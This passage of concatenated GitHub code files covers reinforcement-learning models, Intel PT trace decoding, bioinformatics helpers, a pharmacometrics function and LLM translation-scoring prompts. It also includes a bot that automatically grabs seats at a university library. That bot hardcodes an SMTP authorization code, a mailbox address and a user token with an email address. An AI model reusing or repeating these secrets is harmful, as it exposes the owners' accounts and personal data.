self.liner(state)\r\n d_probs = self.d_prob(x)\r\n mu = self.mu_head(x)\r\n sigma = self.sigma_head(x)\r\n return d_probs, mu, sigma\r\n\r\n def get_dist(self, state):\r\n d_probs, mu, sigma = self.forward(state)\r\n d_dist = Categorical(d_probs)\r\n c_dist = Normal(mu, sigma)\r\n return d_dist, c_dist\r\n\r\n\r\nclass Critic(nn.Module):\r\n def __init__(self, state_dim, hidden_dim):\r\n super(Critic, self).__init__()\r\n self.critic = nn.Sequential(\r\n nn.Linear(state_dim, hidden_dim),\r\n nn.ReLU(),\r\n nn.Linear(hidden_dim, hidden_dim),\r\n nn.ReLU(),\r\n nn.Linear(hidden_dim, 1)\r\n )\r\n\r\n def forward(self, state):\r\n value = self.critic(state)\r\n return value\r\n","repo_name":"RainingStorm/SmartMicroGrid","sub_path":"算法对比/PPO/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} 
+{"seq_id":"1035760863","text":"import os\nimport sys\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\n\nimport pickle\nimport pprint\nfrom zipfile import ZipFile\nfrom datetime import datetime, timedelta\nimport tempfile\nimport logging\n\nimport iptanalyzer.pyipt\nimport windbgtool.debugger\n\nclass Loader:\n def __init__(self, dump_filename = '', load_image = False, dump_instructions = False, dump_symbols = True, temp_directory = '', debug_level = 0): \n self.debug_level = debug_level\n self.dump_instructions = dump_instructions\n self.dump_symbols = dump_symbols\n self.load_image = load_image\n self.load_image_ranges = []\n self.loaded_modules = {}\n self.no_map_addresses = {}\n\n self.address_list = None\n self.psb_offsets = []\n self.records = []\n\n if temp_directory:\n self.temp_directory = temp_directory\n else:\n self.temp_directory = tempfile.gettempdir()\n\n if dump_filename:\n self.debugger = windbgtool.debugger.DbgEngine()\n self.debugger.load_dump(dump_filename)\n self.address_list = self.debugger.get_address_list()\n\n if self.dump_symbols:\n self.debugger.enumerate_modules()\n else:\n self.debugger = None\n\n def open(self, pt_filename, start_offset = 0, end_offset = 0):\n self.start_offset = start_offset\n self.end_offset = end_offset\n\n self.loaded_modules = {}\n self.no_map_addresses = {}\n\n self.ipt_decoder = iptanalyzer.pyipt.iptdecoder()\n self.ipt_decoder.open(pt_filename, self.start_offset , self.end_offset)\n\n def close(self):\n self.debugger.close_dump()\n\n def __extract_ipt(self, pt_zip_filename, pt_filename ):\n if not os.path.isfile(pt_filename):\n logging.info(\"* Extracting test trace file:\")\n with ZipFile(pt_zip_filename, 'r') as zf:\n zf.extractall()\n\n def __get_hex_line(self, raw_bytes):\n raw_line = ''\n for byte in raw_bytes:\n raw_line += '%.2x ' % (byte % 256)\n \n def dump_memory(self, base_address, region_size):\n dump_filename = os.path.join(self.temp_directory, '%x.dmp' % base_address)\n writemem_cmd = '.writemem %s %x L?%x' % (dump_filename, base_address, region_size)\n self.debugger.run_command(writemem_cmd)\n\n if not os.path.isfile(dump_filename):\n logging.error('dump_memory failed: dump_filename (%s) does not exists' % dump_filename)\n return (0, '')\n\n dump_file_size = os.path.getsize(dump_filename)\n if dump_file_size < region_size:\n logging.error('dump_memory failed: dump_filename (%s) is too short (%x vs %x)' % (dump_filename, os.path.getsize(dump_filename), region_size))\n region_size = dump_file_size\n\n return (region_size, dump_filename)\n\n def add_image(self, address, use_address_map = True, load_module_image = True):\n if address in self.no_map_addresses:\n return False\n\n range_list = []\n if load_module_image:\n if use_address_map and self.address_list:\n for mem_info in self.address_list:\n if mem_info['BaseAddr'] <= address and address < mem_info['EndAddr']:\n range_list.append((mem_info['BaseAddr'], mem_info['RgnSize']))\n logging.debug('add_image mem_info: %s' % (pprint.pformat(mem_info)))\n break\n\n if len(range_list) == 0:\n address_info = self.debugger.get_address_info(address)\n if address_info:\n if self.dump_symbols and 'Module Name' in address_info:\n module_name = address_info['Module Name'].split('.')[0]\n self.debugger.load_symbols([module_name, ])\n\n range_list.append((int(address_info['Base Address'], 16), int(address_info['Region Size'], 16))) \n\n if len(range_list) == 0:\n range_list.append((address & 0xFFFFFFFFFFFFF000, 0x1000))\n range_list.append((address & 
0xFFFFFFFFFFFFFF00, 0x100))\n range_list.append((address & 0xFFFFFFFFFFFFFFF0, 0x10))\n\n for (base_address, region_size) in range_list:\n if self.debug_level > 1:\n logging.debug('add_image address: try to dump base_address: %.8x region_size: %x' % (base_address, region_size))\n\n if base_address in self.loaded_modules:\n loaded_region_size = self.loaded_modules[base_address]\n if base_address + loaded_region_size > address:\n logging.debug('add_image cached base_address: %.8x loaded_region_size: %x' % (base_address, loaded_region_size))\n return True\n\n (loaded_region_size, dump_filename) = self.dump_memory(base_address, region_size)\n if loaded_region_size != 0 and address < base_address + loaded_region_size:\n region_size = loaded_region_size\n break\n\n if base_address + region_size <= address:\n self.no_map_addresses[address] = True\n return False\n\n if self.debug_level > 1:\n logging.debug('add_image base_address: %.8x region_size: %x' % (base_address, region_size))\n\n self.ipt_decoder.add_image(base_address, dump_filename)\n self.loaded_modules[address] = region_size\n self.loaded_modules[base_address] = region_size\n return True\n\n def is_in_load_image_range(self, address):\n if len(self.load_image_ranges) == 0:\n return True\n\n for (start_address, end_address) in self.load_image_ranges:\n if start_address <= address and address <= end_address:\n return True\n\n return False\n\n def add_load_image_address_range(self, start_address, end_address):\n self.load_image_ranges.append((start_address, end_address))\n\n def enumerate_sync_offsets(self):\n sync_offsets = []\n\n while 1:\n sync_offset = self.ipt_decoder.get_sync_offset()\n sync_offsets.append(sync_offset)\n\n if not self.ipt_decoder.forward_block_sync():\n break\n\n return sync_offsets\n\n def decode(self, decode_type = 'block', callback = None):\n if decode_type == 'block':\n self.records = []\n self.psb_offsets = []\n\n pt_no_map_error_counts = {}\n while 1:\n if decode_type == 'block':\n decoded_obj = self.ipt_decoder.decode_block()\n if not decoded_obj:\n break\n\n end_address = decoded_obj.end_ip\n else:\n decoded_obj = self.ipt_decoder.decode_instruction()\n if not decoded_obj:\n break\n\n end_address = decoded_obj.ip\n\n if not decoded_obj:\n break\n\n address = decoded_obj.ip\n skip_to_next_sync = False\n decode_status = self.ipt_decoder.get_decode_status()\n offset = self.ipt_decoder.get_offset()\n\n if decode_status == iptanalyzer.pyipt.pt_error_code.pte_ok or decode_status == iptanalyzer.pyipt.pt_error_code.pte_bad_insn:\n if decode_status != iptanalyzer.pyipt.pt_error_code.pte_ok:\n logging.error(\"%.8x: ip: %.16x decode_status: %x (continue)\" % (offset, address, decode_status))\n\n if self.debug_level > 2:\n sync_offset = self.ipt_decoder.get_sync_offset()\n logging.debug(\"%.8x: decode: sync_offset: %.16x ip: %.16x\" % (offset, sync_offset, address))\n \n if callback:\n callback(decoded_obj)\n else:\n return decoded_obj\n\n elif decode_status == iptanalyzer.pyipt.pt_error_code.pte_eos:\n logging.debug(\"%.8x: ip: %.16x decode_status(pte_eos): %x\" % (offset, address, decode_status))\n break\n\n elif decode_status == iptanalyzer.pyipt.pt_error_code.pte_nomap:\n if self.debug_level > 1:\n logging.debug(\"%.8x: ip: %.16x decode_status(pte_nomap): %x\" % (offset, address, decode_status))\n\n if not address in pt_no_map_error_counts:\n pt_no_map_error_counts[address] = 1\n else:\n pt_no_map_error_counts[address] += 1\n\n skip_to_next_sync = True\n \n if pt_no_map_error_counts[address] > 1:\n 
logging.error(\"%.8x: add_image failed %d times for %.16x\" % (offset, pt_no_map_error_counts[address], address))\n elif self.load_image:\n if self.add_image(address):\n if self.debug_level > 1:\n logging.debug(\"%.8x: add_image succeed for %.16x\" % (offset, address))\n skip_to_next_sync = False\n else:\n if self.debug_level > 1:\n logging.debug(\"%.8x: add_image failed for %.16x\" % (offset, address))\n else:\n logging.error(\"%.8x: ip: %.16x decode_status: %x\" % (offset, address, decode_status))\n skip_to_next_sync = True\n\n if skip_to_next_sync:\n logging.debug(\"%.8x: forward_block_sync @%.16x\" % (offset, address))\n if not self.ipt_decoder.forward_block_sync():\n logging.debug(\"%.8x: forward_block_sync failed for %.16x\" % (offset, address))\n break\n return None\n\n def record_block_offset(self, block):\n address = block.ip\n block_end_address = block.end_ip\n cr3 = self.ipt_decoder.get_current_cr3()\n sync_offset = self.ipt_decoder.get_sync_offset()\n offset = self.ipt_decoder.get_offset()\n\n if self.debug_level > 1:\n logging.debug(\"%.8x: record_block_offsets: sync_offset: %.16x cr3: %.16x ip: %.16x\" % (offset, sync_offset, cr3, address))\n\n self.records.append({'IP': address, 'EndIP': block_end_address, 'SyncOffset': sync_offset, 'Offset': offset, 'CR3': cr3})\n\n def record_block_offsets(self):\n self.decode(decode_type = 'block', callback = self.record_block_offset)\n\n def decode_blocks(self, offset = 0, start_address = 0, end_address = 0):\n while 1:\n block = self.decode(decode_type = 'block')\n if not block:\n break\n\n current_offset = self.ipt_decoder.get_offset()\n\n if offset > 0:\n if offset == current_offset:\n yield block\n elif offset < current_offset:\n break\n else:\n if (start_address == 0 and end_address == 0) or start_address <= block.ip and block.ip <= end_address:\n yield block\n\n def decode_instructions(self, offset = 0, start_address = 0, end_address = 0, stop_address = 0):\n while 1:\n instruction = self.decode(decode_type = 'instruction')\n if not instruction:\n break\n\n current_offset = self.ipt_decoder.get_offset()\n if offset > 0:\n if offset == current_offset:\n yield instruction\n\n if offset < current_offset:\n break\n else:\n if (start_address == 0 and end_address == 0) or start_address <= instruction.ip and instruction.ip <= end_address:\n yield instruction\n\n if stop_address != 0 and instruction.ip == stop_address:\n break\n\n def decode_ranges(self, sync_offset = 0, ranges = []):\n if sync_offset > 0:\n self.ipt_decoder.set_instruction_sync_offset(sync_offset)\n\n stop_addresses = {}\n for (start_address, end_address) in ranges:\n stop_addresses[end_address] = 1\n\n while 1:\n instruction = self.decode(decode_type = 'instruction')\n if not instruction:\n break\n\n current_offset = self.ipt_decoder.get_offset()\n current_sync_offset = self.ipt_decoder.get_sync_offset()\n\n for (start_address, end_address) in ranges:\n if start_address <= instruction.ip and instruction.ip <= end_address:\n logging.debug('%.16x: instruction.ip: %.16x' % (current_offset, instruction.ip))\n if instruction.ip in stop_addresses:\n logging.debug(\"* Found instruction.ip (%x) in stop_addresses\" % instruction.ip)\n del stop_addresses[instruction.ip]\n logging.debug('\\tlen(stop_addresses): %d' % len(stop_addresses))\n\n yield instruction\n break\n\n if len(stop_addresses) == 0:\n break\n\n if current_sync_offset > sync_offset:\n 
break\n","repo_name":"ohjeongwook/iptanalyzer","sub_path":"src/iptanalyzer/ipt.py","file_name":"ipt.py","file_ext":"py","file_size_in_byte":13029,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"3"} +{"seq_id":"74195258962","text":"import re\nimport itertools\n\ndef extract(dna_strings=\"\"):\n dna_dict = {}\n current_dna_name = \"\"\n for line in dna_strings.splitlines():\n if line.startswith(\">\"):\n current_dna_name = line.replace(\">\", \"\")\n dna_dict[current_dna_name] = \"\"\n else:\n dna_dict[current_dna_name] += line.strip()\n return dna_dict\n\n\ndef find_motif(strand=\"GATATATGCATATACTT\", motif=\"ATAT\"):\n positions = {}\n strand_index = 0\n while re.search(motif, strand[strand_index:]) is not None:\n m = re.search(motif, strand[strand_index:])\n start = strand_index + m.start()\n content = m.group()\n if start not in positions:\n positions[start] = content\n strand_index = start + 1\n return positions\n\n\ndef sort_dict(input_dict={}):\n result = {}\n for key in sorted(input_dict.keys()):\n result[key] = input_dict[key]\n return result\n\n\ndef get_codon_protein_dict():\n dict_codon_protein = {}\n with open(\"rna_codon_table\", \"r\") as codon_file:\n codons_names = codon_file.read().split()\n for i in range(0, len(codons_names), 2):\n codon = codons_names[i]\n name = codons_names[i + 1]\n dict_codon_protein[codon] = name\n # print(codon_dict)\n return dict_codon_protein\n\n\ndef get_protein_codon_dict():\n dict_protein_codon = {}\n with open(\"rna_codon_table\", \"r\") as codon_file:\n codons_names = codon_file.read().split()\n for i in range(0, len(codons_names), 2):\n codon = codons_names[i]\n protein = codons_names[i + 1]\n if protein in dict_protein_codon:\n dict_protein_codon[protein].append(codon)\n else:\n dict_protein_codon[protein] = [codon]\n # print(codon_dict)\n return dict_protein_codon\n\n\ndef get_complement(dna_strand) -> str:\n complements = get_complement_dict()\n\n complement_strand = []\n for nt in dna_strand:\n complement_strand.append(complements[nt])\n return \"\".join(complement_strand)\n\n\ndef get_complement_dict():\n complements = {\"A\": \"T\", \"G\": \"C\"}\n revd = dict()\n for i in complements.items():\n revd[i[1]] = i[0]\n complements.update(revd)\n return complements\n\n\ndef find_start_codon(reading_frame=\"\", start=0) -> int:\n start_codon = get_protein_codon_dict()[\"M\"]\n\n for pos in range(start, len(reading_frame) - 3):\n try_codon = reading_frame[pos:pos + 3].replace(\"T\", \"U\")\n if try_codon in start_codon:\n return pos\n return -1\n\n\ndef transcribe_until_stop(reading_frame=\"\", start=0):\n proteins = []\n protein_codon_dict = get_protein_codon_dict()\n codon_protein_dict = get_codon_protein_dict()\n stop_codons = protein_codon_dict[\"Stop\"]\n for pos in range(start, len(reading_frame), 3):\n codon = reading_frame[pos:pos + 3].replace(\"T\", \"U\")\n if codon in stop_codons:\n break\n else:\n proteins.append(codon_protein_dict[codon])\n return proteins\n\n\ndef transcribe_rna_aminoacids(rna_string=\"\"):\n codon_name_dict = get_codon_protein_dict()\n aminoacids = []\n for i in range(0, len(rna_string), 3):\n codon = str(rna_string[i:i + 3])\n if codon not in codon_name_dict:\n return None\n else:\n aminoacid = codon_name_dict[codon]\n aminoacids.append(aminoacid)\n if len(aminoacids) == 0 or aminoacids[len(aminoacids)-1] != \"Stop\":\n return None\n else:\n return aminoacids\n\n\ndef close_at_stop(strand=\"\"):\n codons = []\n\n stop_codons = get_protein_codon_dict()[\"Stop\"]\n 
for pos in range(0,len(strand),3):\n codon = strand[pos:pos + 3].replace(\"T\", \"U\")\n codons.append(codon)\n if codon in stop_codons:\n break\n\n return \"\".join(codons)\n\n\ndef get_start_stop_regions(rna_string=\"\"):\n start_stop_regions = []\n pos = 0\n while pos >= 0:\n pos = find_start_codon(rna_string, pos)\n if pos >= 0:\n remaining = close_at_stop(rna_string[pos:])\n start_stop_regions.append(remaining)\n pos += 1\n return start_stop_regions\n\n\ndef get_reading_frames(dna_strand=\"\"):\n possible_reading_frames = []\n for i in range(3):\n possible_reading_frames.append(dna_strand[i:])\n return possible_reading_frames\n\n\ndef get_all_substrings(strand=\"\"):\n length = len(strand)\n substrings = []\n\n for start in range(length):\n for end in range(start+1,length+1):\n substring = strand[start:end]\n substrings.append(substring)\n return substrings\n\ndef get_dict_pos_substring(strand=\"\"):\n length = len(strand)\n dict_pos_substring = {}\n\n for start in range(length):\n for end in range(start + 1, length + 1):\n substring = strand[start:end]\n if start not in dict_pos_substring:\n dict_pos_substring[start] = [substring]\n else:\n dict_pos_substring[start].append(substring)\n\n return dict_pos_substring\n\n\ndef get_subsequences_of_length(strand=\"ABCDEF\", length=4):\n perm_source = []\n for i in range(len(strand)):\n perm_source.append(i)\n\n perms = itertools.permutations(perm_source, length)\n\n list_perms = []\n\n for perm in perms:\n list_perm = sorted(list(perm))\n if list_perm not in list_perms:\n list_perms.append(list_perm)\n\n list_subsequences = []\n for list_perm in list_perms:\n subsequence_characters = []\n for position in list_perm:\n subsequence_characters.append(strand[position])\n list_subsequences.append(\"\".join(subsequence_characters))\n\n return list_subsequences\n\n\ndef get_subsequences_all_lengths(strand=\"ABCDEF\"):\n all_subseqs = []\n for i in range(1, len(strand)+1):\n all_subseqs.extend(get_subsequences_of_length(strand, i))\n\n return all_subseqs\n","repo_name":"denizcetiner/rosalindpractice","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":5835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1286175647","text":"# -*- coding: utf8 -*-\r\nimport re\r\nimport os\r\nimport json\r\nimport smtplib\r\nimport logging\r\nimport requests\r\nfrom threading import Thread\r\nfrom datetime import datetime\r\nfrom email.mime.text import MIMEText\r\nfrom email.mime.image import MIMEImage\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.application import MIMEApplication\r\n# 日志相关\r\nlogger = logging.getLogger()\r\nlogger.setLevel(logging.WARNING)\r\n\r\n\r\nclass Book(Thread):\r\n host = 'https://libreserve.sdust.edu.cn'\r\n state_dict = {\r\n 1: '预约中',\r\n 2: '已进入',\r\n 3: '已离开',\r\n 4: '已取消',\r\n 5: '已失效'\r\n }\r\n\r\n def __init__(self, user, token, isContinue, email_adress):\r\n super(Book, self).__init__()\r\n self.user = user\r\n self.token = token\r\n self.email_adress = email_adress\r\n self.output_json = {}\r\n self.headers = {}\r\n self.output_json['user'] = self.user\r\n self.isContinue = isContinue\r\n self.headers['authorization'] = self.token\r\n self.can_order_type = [2]\r\n self.order_type_index = 0\r\n self.type_number = self.can_order_type[self.order_type_index]\r\n\r\n # 预定函数\r\n def run(self):\r\n # 核实状态\r\n self.check_state()\r\n if self.isContinue:\r\n self.cancel_recored()\r\n else:\r\n if self.state == '已进入':\r\n 
self.output_json['state'] = self.state\r\n self.output_json['msg'] = '您已进入{}'.format(self.seat_number)\r\n return\r\n elif self.state == '预约中':\r\n self.output_json['state'] = self.state\r\n self.output_json['msg'] = '您已预约{}'.format(self.seat_number)\r\n return \r\n self.output_json['msg'] = self.order()\r\n self.output_json['state'] = self.state\r\n # 邮件通知\r\n if self.state == '续约成功':\r\n self.send_email('{},续约状态: {}'.format(self.user, self.state), str(self.output_json))\r\n elif self.state == '预约成功':\r\n self.send_email('{},抢到座位啦-{}'.format(self.user, self.seat_number), str(self.output_json))\r\n\r\n # 检查用户状态\r\n def check_state(self):\r\n url_history = '/api/homeapi/user/getMyOrderRecored?page=1&pageSize=15'\r\n r = requests.get(self.host + url_history, headers=self.headers)\r\n recent_recored = json.loads(r.text)['data'][0]\r\n status = recent_recored['status']\r\n self.state = self.state_dict[status]\r\n if status >= 4: # 取消或失效\r\n # 改成send_email\r\n print('{},未检测到预约信息,为您预约中...'.format(\r\n self.user))\r\n elif status == 1: # 预约中\r\n self.seat_number = recent_recored['address']\r\n elif status == 2: # 已进入\r\n self.seat_number = recent_recored['address']\r\n if (datetime.now()-datetime.strptime(recent_recored['enter_time'], r'%Y-%m-%d %H:%M:%S')).seconds / 1000 < 20:\r\n current_hour = datetime.now().hour\r\n if current_hour in [7, 8]:\r\n self.send_email('{},早上好,很高兴见到您'.format(self.user), '祝您心情舒畅,学习愉快~\\n学习之余,记得喝水哦,多活动活动')\r\n elif current_hour in [13, 14]:\r\n self.send_email('{},下午好,老朋友,又见到您了'.format(self.user), '祝您心情舒畅,学习愉快~\\n学习之余,记得喝水哦,多活动活动')\r\n elif current_hour in [18, 19, 20]:\r\n self.send_email('{},晚上好,坚持就是胜利!加油~'.format(self.user), '祝您心情舒畅,学习愉快~\\n学习之余,记得喝水哦,多活动活动')\r\n elif recent_recored['status'] == 3: # 已离开\r\n if (datetime.now() - datetime.strptime(recent_recored['leave_time'], r'%Y-%m-%d %H:%M:%S')).seconds / 1000 < 20:\r\n current_hour = datetime.now().hour\r\n if current_hour in [11, 12, 13]:\r\n self.send_email('忙碌了一上午的{},检测到您已离开图书馆'.format(self.user), '好好吃饭睡觉呀,抢座还是交给我吧,我在马不停蹄滴抢座中...')\r\n elif current_hour in [17, 18]:\r\n self.send_email('学了了一下午了,{},检测到您已离开图书馆'.format(self.user), '好好吃饭,抢座还是交给我吧,我在马不停蹄滴抢座中...')\r\n elif current_hour in [20, 21, 22, 23]:\r\n self.send_email('夜深了,{},注意保暖,明天再来哟~'.format(self.user), '回去好好睡觉,忙碌了一天了,我也该休息了,晚安,好梦,good night~')\r\n\r\n # 预定座位\r\n def order(self):\r\n url_get_seat = '/api/homeapi/user/userOrderRoom?type={}'.format(self.type_number)\r\n r = requests.get(self.host + url_get_seat, headers=self.headers)\r\n r.encoding = 'utf-8'\r\n data = json.loads(r.text)\r\n seat_number = re.findall('\\d+', data['msg'])\r\n if '排队' in data['msg']:\r\n if self.order_type_index + 1 < len(self.can_order_type):\r\n self.type_number = self.can_order_type[self.order_type_index+1]\r\n return self.order()\r\n else:\r\n self.state = '续约失败' if self.isContinue else '预约失败'\r\n return '在抢了,在抢了,很快就会有的...'\r\n elif 'downloading' in data['msg'] or '重新预约' in data['msg']:\r\n return self.order()\r\n elif len(seat_number):\r\n self.state = '续约成功' if self.isContinue else '预约成功'\r\n print(self.state)\r\n self.seat_number = seat_number[0]\r\n return '预约成功-{}'.format(self.seat_number)\r\n\r\n # 取消预订\r\n def cancel_recored(self):\r\n url_cancel = '/api/homeapi/user/cancelRecored?type={}'.format(\r\n self.type_number,)\r\n r = requests.get(self.host + url_cancel, headers=self.headers)\r\n data = json.loads(r.text)\r\n return data['msg']\r\n\r\n # 发送邮箱信息\r\n def send_email(self, s, c):\r\n msg_Sender = '277611581@qq.com' # 发送方邮箱\r\n # 发送方邮箱的授权码aoqgeoezwnmcbigb(小号) 
abmiysvgtsfjdicd(大号)\r\n msg_code = 'aoqgeoezwnmcbigb'\r\n if len(self.email_adress):\r\n msg_Receiver = self.email_adress # 收件人邮箱\r\n else:\r\n self.output_json['email'] = '未提供邮箱信息'\r\n return\r\n\r\n subject = s # 主题\r\n content = c # 正文\r\n msg = MIMEText(content, 'plain', 'utf-8')\r\n\r\n msg['Subject'] = subject\r\n msg['From'] = msg_Sender\r\n msg['To'] = msg_Receiver\r\n try:\r\n s = smtplib.SMTP_SSL(\"smtp.qq.com\", 465) # 邮件服务器及端口号\r\n s.login(msg_Sender, msg_code)\r\n s.sendmail(msg_Sender, msg_Receiver, msg.as_string())\r\n self.output_json['email'] = True\r\n except Exception as e:\r\n self.output_json['email'] = False\r\n finally:\r\n s.quit()\r\n\r\n # 一言\r\n def get_hitokoto(self):\r\n r = requests.get(\r\n 'https://international.v1.hitokoto.cn/', headers=self.headers)\r\n data = json.loads(r.text)\r\n return '{hitokoto}'.format(**data)\r\n\r\n\r\n# 信息查询\r\ndef get_info():\r\n host = 'https://libreserve.sdust.edu.cn'\r\n url_get_info = '/api/homeapi/Index/getStatisticDataByType?type=2'\r\n r = requests.get(host + url_get_info)\r\n data = json.loads(r.text)['data']\r\n print('室内人数:{onRoomNum} | 预约人数:{orderNum} | 剩余座位:{canOrderNum} | 今日人流量:{todayTrfficNum}'.format(**data))\r\n # 获取等待用户数据\r\n url_get_wait = '/api/homeapi/Index/getWaitingUserList?&page=1&pageSize=15'\r\n r = requests.get(host + url_get_wait)\r\n data = json.loads(r.text)['data']\r\n print('当前等待: {}位'.format(len(data)))\r\n for user in data:\r\n print('姓名:{name} | 时间:{wait_minutes}'.format(**user))\r\n\r\n\r\ndef main(*args):\r\n # 判断运行状态\r\n isContinue = datetime.now().minute % 30 == 0 and datetime.now().second < 6\r\n # 输出关键信息\r\n try:\r\n get_info()\r\n except:\r\n print('[运行状态]: 获取信息失败')\r\n print('[运行模式]: ' + ('续约中...' if isContinue else '抢座中...'))\r\n # 创建线程\r\n all_user_threads_dict = {}\r\n test_dict = {'Polygon': 'bfd5b2201042a6508f8381a65b9f596b | 33699@outlook.com'}\r\n for key, value in test_dict.items():\r\n if re.match('[\\w\\d]{32}.*', value):\r\n if '|' in value:\r\n token, email_address = value.split(' | ')\r\n else:\r\n token = value\r\n email_address = ''\r\n all_user_threads_dict[key] = Book(\r\n key, token, isContinue, email_address)\r\n for user, book in all_user_threads_dict.items():\r\n book.start()\r\n for user, book in all_user_threads_dict.items():\r\n book.join()\r\n all_output_json = {}\r\n for user, book in all_user_threads_dict.items():\r\n print(book.output_json)\r\n all_output_json[user] = book.output_json\r\n return all_output_json\r\nmain()\r\n","repo_name":"MuiseDestiny/Library","sub_path":"图书馆-9-28.py","file_name":"图书馆-9-28.py","file_ext":"py","file_size_in_byte":9388,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"37204785319","text":"\"\"\"\"\r\n## Function written to match MATLAB function mf_all()\r\n## Then manually adjusted to make work\r\n\r\n\r\n## Author: Caiya Zhang, Yuchen Zheng\r\n\"\"\"\r\n\r\n\r\nfrom project.mf3 import mf3\r\nfrom project.mf7 import mf7\r\nfrom project.util import get_dict_value\r\n\r\n\r\ndef mf_all(model_switch, xt_ind, x, a, bpop, d, sigma, docc, pypkpd_db):\r\n\r\n iFIMCalculationType = get_dict_value(pypkpd_db, \"settings\", \"iFIMCalculationType\") + 1\r\n returnArgs = None\r\n if iFIMCalculationType == 1:\r\n returnArgs = mf3(model_switch,xt_ind,x,a,bpop,d,sigma,docc,pypkpd_db) #Default (with no assumption that bpop and b are uncorrelated)\r\n elif iFIMCalculationType == 2:\r\n returnArgs = mf3(model_switch,xt_ind,x,a,bpop,d,sigma,docc,pypkpd_db) #Reduced FIM\r\n elif 
iFIMCalculationType == 3:\r\n raise Exception(\"Not yet implemented\")\r\n elif iFIMCalculationType == 4:\r\n raise Exception(\"Not yet implemented\")\r\n elif iFIMCalculationType == 5:\r\n returnArgs = mf3(model_switch,xt_ind,x,a,bpop,d,sigma,docc,pypkpd_db) #Reduced FIM with derivative of SD sigma\r\n elif iFIMCalculationType == 6:\r\n returnArgs = mf3(model_switch,xt_ind,x,a,bpop,d,sigma,docc,pypkpd_db) #FULL FIM parameterized with A,B,C matrices & derivative of variance\r\n elif iFIMCalculationType == 7:\r\n returnArgs = mf7(model_switch,xt_ind,x,a,bpop,d,sigma,docc,pypkpd_db) #Calculate one model switch at a time, good for large matrices\r\n elif iFIMCalculationType == 8:\r\n returnArgs = mf3(model_switch,xt_ind,x,a,bpop,d,sigma,docc,pypkpd_db) #Reduced FIM parameterized with A,B,C matrices & derivative of variance\r\n\r\n if returnArgs is None: \r\n raise Exception(\"Unknown FIM-calculation type\")\r\n \r\n return returnArgs","repo_name":"felixzheng02/pypkpd","sub_path":"project/mf_all.py","file_name":"mf_all.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"38429499283","text":"from datasets import load_dataset\nfrom datasets import Dataset\nimport json\nimport pandas as pd\nimport os\nfrom tqdm import tqdm\n\nimport torch\nfrom transformers import AutoModelForCausalLM, AutoConfig, AutoTokenizer, BitsAndBytesConfig, AutoTokenizer, TrainingArguments\nfrom peft import LoraConfig, get_peft_model\nfrom trl import SFTTrainer\nfrom huggingface_hub import login\nfrom accelerate import infer_auto_device_map, init_empty_weights\n\n### ============ Parameters ==================\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\nmodel_name = \"pankajmathur/orca_mini_v3_7b\"\n\ndataset_name = \"en_de\" ### [\"en_de\", \"en_es\", \"en_zh\"]\n### ============ Parameters ==================\n\n\n### Prompt generation template >>> begin\n\n# GENERAL_INSTRUCTION = \"\"\"\n# The task is to score a translated text from {English} to {German} with respect to the source sentence on a continous scale from 0 to 100,\n# along with explaination in JSON format with \"score\" and \"explanation\" keys as follows: {\"score\": , \"explanation\": }.\n# Where a score of zero means \"no meaning preserved and poor translation quality\" and score of one hundred means \"excellant translation quality with perfect meaning and grammar\".\n# You must justify the score that you provided with clear and concise reason within 2 sentences interms of justifying the adequacy, fluency, faithfulness metrics.\n# The source sentence and target sentence is given in triple backticks with ### source sentence: and ### target sentence: as prefix respectively.\n# Note: The generated response must be in json format without any missed braces or incomplete text. Also, it should not provide any additional information other than JSON output.\n# \"\"\"\n\nGENERAL_INSTRUCTION = \"\"\"\nYou will be given one translated sentence in {Spanish} for a source sentence in {English}.\n\nYour task is to assign the single score for the translation on continuous scale from 0 to 100 along with explanation.\n\nPlease make sure you read and understand these instructions carefully. Please keep this document open while reviewing, and refer to it as needed. 
For explanation, you must justify the score that you provided with clear and concise reason within 2 sentences interms of justifying the adequacy, fluency and faithfulness metrics.\n\nThe source text and translation text is given in triple backticks ``` with \"Source Text:\" and \"Translation:\" as prefix respectively.\n\nEvaluation Criteria:\n1) Adequacy (1-5) - the correspondence of the target text to the source text, including the expressive means in translation. Annotators were instructed to penalize translation which contained misinformation, redundancies and excess information. Here, 1 is the lowest and 5 is the highest.\n2) Faithfulness (1-5) - translation faithfulness to the meaning depends on how the translator interprets the speaker's intention and does not imply that one should never or always translate literally. Here, 1 is the lowest and 5 is the highest.\n3) Fluency (1-3): the quality of the translation in terms of grammar, spelling, punctuation, word choice, and sentence structure.\n - 1: Poor. The translation has many errors that make it hard to understand or sound unnatural.\n - 2: Fair. The translation has some errors that affect the clarity or smoothness of the text, but the main points are still comprehensible.\n - 3: Good. The translation has few or no errors and is easy to read and follow.\n\nEvaluation Steps:\n1. Read the translation and the source document carefully.\n2. Compare the translation to the source text.\n3. Assign scores for Adequacy, Faithfulness and Fluency based on the Evaluation Criteria.\n4. By utilizing the generated scores of Adequacy, Faithfulness and Fluency, aggregate these scores to assign the single score for the translation on continuous scale from 0 to 100 along with explanation in JSON format with \"score\" and \"explanation\" keys as follows: {\"score\": , \"explanation\": }.\n\"\"\"\n\nMODEL_INPUT_TEMPLATE = {\n 'prompts_input_with_output': \"### Instruction: {}\\n### Source Text: ```{}```\\n### Translation: ```{}```\\n### Response: {}\",\n 'prompts_input_without_output': \"### Instruction: {}\\n### Source Text: ```{}```\\n### Translation: ```{}```\\n### Response: \",\n 'output_separator': \"Response: \"\n}\n\nprompt_input_with_output = MODEL_INPUT_TEMPLATE['prompts_input_with_output']\nprompts_input_without_output = MODEL_INPUT_TEMPLATE['prompts_input_without_output']\n\n### Prompt generation template <<< end\n\n\ndef prepare_dataset(df, split_type = 'train'):\n final_data = []\n \n for i in range(df.shape[0]):\n instruction = \"\"\n\n text = df['SRC'].iloc[i]\n translation = \"\"\n if split_type in ['train', 'dev']:\n translation = 